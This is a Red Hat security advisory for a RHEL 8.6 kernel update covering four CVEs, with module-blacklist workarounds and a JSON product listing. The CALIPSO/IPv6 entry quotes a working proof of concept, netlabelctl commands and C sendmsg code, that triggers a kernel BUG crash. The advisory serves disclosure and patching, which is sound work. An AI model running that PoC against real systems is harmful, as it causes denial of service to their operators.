RHSA-2026:5691

Vulnerability from csaf_redhat - Published: 2026-03-25 00:45 - Updated: 2026-03-30 23:24
Summary
Red Hat Security Advisory: kernel security update
Severity
Moderate
Notes
Topic: An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details: The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es): * kernel: Linux kernel: RDMA/rxe use-after-free vulnerability leading to potential arbitrary code execution (CVE-2025-38024) * kernel: RDMA/rxe: Fix incomplete state save in rxe_requester (CVE-2023-53539) * kernel: sctp: avoid NULL dereference when chunk data buffer is missing (CVE-2025-40240) * kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (CVE-2025-71085) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

An incorrect state restoration flaw was found in the Linux kernel's RDMA rxe (soft-RoCE) driver in the requester packet transmission logic. A local user with access to RDMA devices can trigger this issue when network layer packet drops occur during RDMA send operations, causing the work queue element state to be incompletely saved and restored. This results in data corruption in resent packets, leading to denial of service or potential data integrity issues.

Vendor Fix For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 The system must be rebooted for this update to take effect. https://access.redhat.com/errata/RHSA-2026:5691
Workaround To mitigate this issue, prevent the rdma_rxe module from being loaded. See https://access.redhat.com/solutions/41278 for instructions on blacklisting kernel modules.

A flaw was found in the Linux kernel's Remote Direct Memory Access (RDMA) subsystem, specifically within the `rxe` component. This use-after-free vulnerability occurs in the `rxe_create_cq` function. When the `rxe_cq_from_init` function fails, the subsequent call to `rxe_cleanup` attempts to free memory resources that have already been released, leading to memory corruption. A local attacker with high privileges could exploit this flaw to cause a denial of service or potentially achieve arbitrary code execution.

CWE-825 - Expired Pointer Dereference
Vendor Fix For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 The system must be rebooted for this update to take effect. https://access.redhat.com/errata/RHSA-2026:5691
Workaround To mitigate this issue, prevent the `rxe` kernel module from loading. This can be achieved by creating a blacklist rule. 1. Create a file `/etc/modprobe.d/blacklist-rxe.conf` with the following content: ``` blacklist rxe install rxe /bin/true ``` 2. Rebuild the initial ramdisk: ```bash dracut -f -v ``` 3. Reboot the system for the changes to take effect. Warning: Blacklisting the `rxe` module may impact functionality that relies on Soft RoCE.

In the Linux kernel, the following vulnerability has been resolved: sctp: avoid NULL dereference when chunk data buffer is missing chunk->skb pointer is dereferenced in the if-block where it's supposed to be NULL only. chunk->skb can only be NULL if chunk->head_skb is not. Check for frag_list instead and do it just before replacing chunk->skb. We're sure that otherwise chunk->skb is non-NULL because of outer if() condition.

CWE-476 - NULL Pointer Dereference
Vendor Fix For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 The system must be rebooted for this update to take effect. https://access.redhat.com/errata/RHSA-2026:5691
Workaround To mitigate this issue, prevent module sctp from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically.

In the Linux kernel, the following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0). The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead. Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default netlabelctl calipso add pass doi:7 netlabelctl map add default address:0::1/128 protocol:calipso,7 Then run the following PoC: int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr int cmsg_size = 2; int cmsg_len = 0x60; struct msghdr msg; struct sockaddr_in6 dest_addr; struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len); msg.msg_name = &dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = NULL; msg.msg_iovlen = 0; msg.msg_control = cmsg; msg.msg_controllen = cmsg_len; msg.msg_flags = 0; // setup sockaddr dest_addr.sin6_family = AF_INET6; dest_addr.sin6_port = htons(31337); dest_addr.sin6_flowinfo = htonl(31337); dest_addr.sin6_addr = in6addr_loopback; dest_addr.sin6_scope_id = 31337; // setup cmsghdr cmsg->cmsg_len = cmsg_len; cmsg->cmsg_level = IPPROTO_IPV6; cmsg->cmsg_type = IPV6_HOPOPTS; char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr); hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80 sendmsg(fd, &msg, 0);

CWE-190 - Integer Overflow or Wraparound
Vendor Fix For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 The system must be rebooted for this update to take effect. https://access.redhat.com/errata/RHSA-2026:5691
Workaround Mitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
References
https://access.redhat.com/errata/RHSA-2026:5691 self
https://access.redhat.com/security/updates/classi… external
https://bugzilla.redhat.com/show_bug.cgi?id=2373354 external
https://bugzilla.redhat.com/show_bug.cgi?id=2401510 external
https://bugzilla.redhat.com/show_bug.cgi?id=2418832 external
https://bugzilla.redhat.com/show_bug.cgi?id=2429026 external
https://security.access.redhat.com/data/csaf/v2/a… self
https://access.redhat.com/security/cve/CVE-2023-53539 self
https://bugzilla.redhat.com/show_bug.cgi?id=2401510 external
https://www.cve.org/CVERecord?id=CVE-2023-53539 external
https://nvd.nist.gov/vuln/detail/CVE-2023-53539 external
https://lore.kernel.org/linux-cve-announce/202510… external
https://access.redhat.com/security/cve/CVE-2025-38024 self
https://bugzilla.redhat.com/show_bug.cgi?id=2373354 external
https://www.cve.org/CVERecord?id=CVE-2025-38024 external
https://nvd.nist.gov/vuln/detail/CVE-2025-38024 external
https://lore.kernel.org/linux-cve-announce/202506… external
https://access.redhat.com/security/cve/CVE-2025-40240 self
https://bugzilla.redhat.com/show_bug.cgi?id=2418832 external
https://www.cve.org/CVERecord?id=CVE-2025-40240 external
https://nvd.nist.gov/vuln/detail/CVE-2025-40240 external
https://lore.kernel.org/linux-cve-announce/202512… external
https://access.redhat.com/security/cve/CVE-2025-71085 self
https://bugzilla.redhat.com/show_bug.cgi?id=2429026 external
https://www.cve.org/CVERecord?id=CVE-2025-71085 external
https://nvd.nist.gov/vuln/detail/CVE-2025-71085 external
https://lore.kernel.org/linux-cve-announce/202601… external

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://access.redhat.com/security/updates/classification/",
      "text": "Moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
        "title": "Topic"
      },
      {
        "category": "general",
        "text": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Linux kernel: RDMA/rxe use-after-free vulnerability leading to potential arbitrary code execution (CVE-2025-38024)\n\n* kernel: RDMA/rxe: Fix incomplete state save in rxe_requester (CVE-2023-53539)\n\n* kernel: sctp: avoid NULL dereference when chunk data buffer is missing (CVE-2025-40240)\n\n* kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (CVE-2025-71085)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
        "title": "Details"
      },
      {
        "category": "legal_disclaimer",
        "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
        "title": "Terms of Use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://access.redhat.com/security/team/contact/",
      "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
      "name": "Red Hat Product Security",
      "namespace": "https://www.redhat.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "https://access.redhat.com/errata/RHSA-2026:5691",
        "url": "https://access.redhat.com/errata/RHSA-2026:5691"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/updates/classification/#moderate",
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "category": "external",
        "summary": "2373354",
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373354"
      },
      {
        "category": "external",
        "summary": "2401510",
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2401510"
      },
      {
        "category": "external",
        "summary": "2418832",
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418832"
      },
      {
        "category": "external",
        "summary": "2429026",
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429026"
      },
      {
        "category": "self",
        "summary": "Canonical URL",
        "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5691.json"
      }
    ],
    "title": "Red Hat Security Advisory: kernel security update",
    "tracking": {
      "current_release_date": "2026-03-30T23:24:03+00:00",
      "generator": {
        "date": "2026-03-30T23:24:03+00:00",
        "engine": {
          "name": "Red Hat SDEngine",
          "version": "4.7.4"
        }
      },
      "id": "RHSA-2026:5691",
      "initial_release_date": "2026-03-25T00:45:50+00:00",
      "revision_history": [
        {
          "date": "2026-03-25T00:45:50+00:00",
          "number": "1",
          "summary": "Initial version"
        },
        {
          "date": "2026-03-25T00:45:50+00:00",
          "number": "2",
          "summary": "Last updated version"
        },
        {
          "date": "2026-03-30T23:24:03+00:00",
          "number": "3",
          "summary": "Last generated version"
        }
      ],
      "status": "final",
      "version": "3"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
                "product": {
                  "name": "Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
                  "product_id": "BaseOS-8.6.0.Z.AUS",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:redhat:rhel_aus:8.6::baseos"
                  }
                }
              },
              {
                "category": "product_name",
                "name": "Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
                "product": {
                  "name": "Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
                  "product_id": "BaseOS-8.6.0.Z.E4S",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:redhat:rhel_e4s:8.6::baseos"
                  }
                }
              },
              {
                "category": "product_name",
                "name": "Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
                "product": {
                  "name": "Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
                  "product_id": "BaseOS-8.6.0.Z.TUS",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:redhat:rhel_tus:8.6::baseos"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "Red Hat Enterprise Linux"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/bpftool@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-core@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-core@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-devel@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-modules@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-modules-extra@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-devel@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-modules@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-modules-extra@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-tools@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-tools-libs@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "perf-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "perf-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "perf-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/perf@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/python3-perf@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/bpftool-debuginfo@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-debuginfo@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debuginfo@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debuginfo-common-x86_64@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-tools-debuginfo@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/perf-debuginfo@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                "product": {
                  "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_id": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/python3-perf-debuginfo@4.18.0-372.185.1.el8_6?arch=x86_64"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "kernel-0:4.18.0-372.185.1.el8_6.src",
                "product": {
                  "name": "kernel-0:4.18.0-372.185.1.el8_6.src",
                  "product_id": "kernel-0:4.18.0-372.185.1.el8_6.src",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel@4.18.0-372.185.1.el8_6?arch=src"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "src"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
                "product": {
                  "name": "kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
                  "product_id": "kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-abi-stablelists@4.18.0-372.185.1.el8_6?arch=noarch"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
                "product": {
                  "name": "kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
                  "product_id": "kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-doc@4.18.0-372.185.1.el8_6?arch=noarch"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "noarch"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/bpftool@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-core@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-core@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-devel@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-modules@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-modules-extra@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-devel@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-modules@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-modules-extra@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-tools@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-tools-libs@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "perf-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "perf-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "perf-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/perf@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/python3-perf@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
